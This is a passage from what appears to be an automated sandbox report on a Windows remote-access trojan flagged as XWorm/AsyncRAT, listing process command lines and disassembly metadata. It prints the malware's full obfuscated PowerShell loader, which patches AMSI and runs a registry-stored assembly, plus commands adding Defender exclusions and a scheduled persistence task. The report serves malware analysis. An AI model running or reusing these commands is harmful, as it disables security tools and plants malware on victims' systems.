har](100)+'');Write-Output $pNdjVVbnfJT.CreateType();}$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+''+'s'+''+[Char](111)+''+'f'+'t.W'+[Char](105)+'n'+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+'f'+[Char](101)+'N'+'a'+''+[Char](116)+'iv'+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$zjaDRBJuPBhArz=$RJkdRlkUxkpOh.GetMethod('G'+'e'+''+'t'+'P'+[Char](114)+''+'o'+''+'c'+''+[Char](65)+''+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SsrFUvzfWALaJuFfDwp=bubCglTffNzZ @([String])([IntPtr]);$tNZWRoZhdGxbOGCpZBOKKk=bubCglTffNzZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$kXUOjVwsnVT=$RJkdRlkUxkpOh.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+'u'+'l'+[Char](101)+''+'H'+'a'+'n'+''+[Char](100)+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+'rn'+'e'+''+[Char](108)+'3'+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$LadMSRasXMAaNc=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object](''+[Char](76)+'oa'+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$SNikSVGRGIadTTQBM=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$kXUOjVwsnVT,[Object]('V'+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$HSvqCok=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp).Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+'ll');$BNdTdCEoXMsXuDwEG=$zjaDRBJuPBhArz.Invoke($Null,@([Object]$HSvqCok,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+'c'+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$DTvdUDKKbk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,4,[ref]$DTvdUDKKbk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$BNdTdCEoXMsXuDwEG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SNikSVGRGIadTTQBM,$tNZWRoZhdGxbOGCpZBOKKk).Invoke($BNdTdCEoXMsXuDwEG,[uint32]8,0x20,[ref]$DTvdUDKKbk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E').GetValue(''+[Char](68)+'e'+'a'+''+'d'+''+[Char](115)+''+'t'+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:13:14:59
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:13:15:02
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\dllhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\dllhost.exe /Processid:{7d42e50e-8059-4906-9d19-fa399c842f66}
                                                      Imagebase:0x7ff70f330000
                                                      File size:21'312 bytes
                                                      MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:7
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\DeadROOTkit.exe'
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\schtasks.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0x7ff76f990000
                                                      File size:235'008 bytes
                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:13:15:03
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:13:15:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\winlogon.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:winlogon.exe
                                                      Imagebase:0x7ff7cd660000
                                                      File size:906'240 bytes
                                                      MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:12
                                                      Start time:13:15:04
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\lsass.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\lsass.exe
                                                      Imagebase:0x7ff7a2ae0000
                                                      File size:59'456 bytes
                                                      MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:13
                                                      Start time:13:15:06
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Users\Public\Deadsvchost.exe
                                                      Imagebase:0x990000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\Public\Deadsvchost.exe, Author: Joe Security
                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\Public\Deadsvchost.exe, Author: ditekSHen
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 96%, ReversingLabs
                                                      • Detection: 71%, Virustotal, Browse
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:13:15:06
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:16
                                                      Start time:13:15:07
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\dwm.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"dwm.exe"
                                                      Imagebase:0x7ff74e710000
                                                      File size:94'720 bytes
                                                      MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:17
                                                      Start time:13:15:10
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:19
                                                      Start time:13:15:11
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:20
                                                      Start time:13:15:11
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:21
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:22
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:23
                                                      Start time:13:15:12
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:24
                                                      Start time:13:15:13
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0x2f0000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:25
                                                      Start time:13:15:14
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:26
                                                      Start time:13:15:15
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:27
                                                      Start time:13:15:16
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:28
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:29
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'DeadROOTkit.exe'
                                                      Imagebase:0x7ff788560000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:13:15:17
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:13:15:18
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:32
                                                      Start time:13:15:18
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:33
                                                      Start time:13:15:19
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:36
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:37
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:38
                                                      Start time:13:15:20
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:39
                                                      Start time:13:15:21
                                                      Start date:13/10/2024
                                                      Path:C:\Users\Public\Deadsvchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                      Imagebase:0xb70000
                                                      File size:35'840 bytes
                                                      MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:40
                                                      Start time:13:15:21
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:41
                                                      Start time:13:15:22
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:42
                                                      Start time:13:15:23
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:43
                                                      Start time:13:15:23
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:44
                                                      Start time:13:15:24
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:45
                                                      Start time:13:15:24
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:46
                                                      Start time:13:15:25
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\svchost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      Imagebase:0x7ff6eef20000
                                                      File size:55'320 bytes
                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      General

                                                      Target ID:47
                                                      Start time:13:15:26
                                                      Start date:13/10/2024
                                                      Path:C:\Windows\System32\spoolsv.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\spoolsv.exe
                                                      Imagebase:0x7ff646ff0000
                                                      File size:842'752 bytes
                                                      MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:false

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 00007FFD9B800C11 Relevance: .4, Instructions: 406COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed69e48d52b2f0ca14f0f90e54f3762c30f22354503cb7201dbf83fb97090212
                                                        • Instruction ID: e348b023b72b213c02b6010f73cbd6452151a8232c9d3644a81846ce5cf3d74e
                                                        • Opcode Fuzzy Hash: ed69e48d52b2f0ca14f0f90e54f3762c30f22354503cb7201dbf83fb97090212
                                                        • Instruction Fuzzy Hash: B9D1C030B1990D8FDBA8EB68C468ABA77E1FF58711B110679E45ED32E6CE34EC419740
                                                        Function 00007FFD9B800533 Relevance: .5, Instructions: 463COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 165a847d0bd8cdf1d984805687f515b31c9a7571a40b4174e95ddb381f6dbb48
                                                        • Instruction ID: 5949a0e3a767a0359576a3bfb0aea6334eb1991965f44b70197b89e21781a735
                                                        • Opcode Fuzzy Hash: 165a847d0bd8cdf1d984805687f515b31c9a7571a40b4174e95ddb381f6dbb48
                                                        • Instruction Fuzzy Hash: 19311822F0EADF5FE71647B848B55E97F60FF5664070A41BAC0A98B0D7DD24E909C341
                                                        Function 00007FFD9B801550 Relevance: .4, Instructions: 447COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74379f5aab75dd9cfa78187e0bbd99e9d9af710ef1a8b284fc03b5ee716af2c8
                                                        • Instruction ID: 3af02653c2f7a25d422b4f32b1d23869b93a3313c8ad2daa77493edf40aa0749
                                                        • Opcode Fuzzy Hash: 74379f5aab75dd9cfa78187e0bbd99e9d9af710ef1a8b284fc03b5ee716af2c8
                                                        • Instruction Fuzzy Hash: 4C713851B1D9894BE7A8EF7C48797B867D1EFAD360F4501BAE08CC32E7DE2898014341
                                                        Function 00007FFD9B8004D0 Relevance: .3, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd9b800000_mIURiU8n2P.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5fc24258502d90129a3c0fcea82ada29daa445bb944c0b71d23e7fccfec7035c
                                                        • Instruction ID: 61820bd453afe9576e22dc428954c4a9871ee207304c194e9be54f03262438b9
                                                        • Opcode Fuzzy Hash: 5fc24258502d90129a3c0fcea82ada29daa445bb944c0b71d23e7fccfec7035c
                                                        • Instruction Fuzzy Hash: BB711552F199494BE7A8AF6C48797F877D2EFAD360F45017AE08DC32E6DE2869014341
                                                        Function 00007FFD9B8008E9 Relevance: .1, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1704719552.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
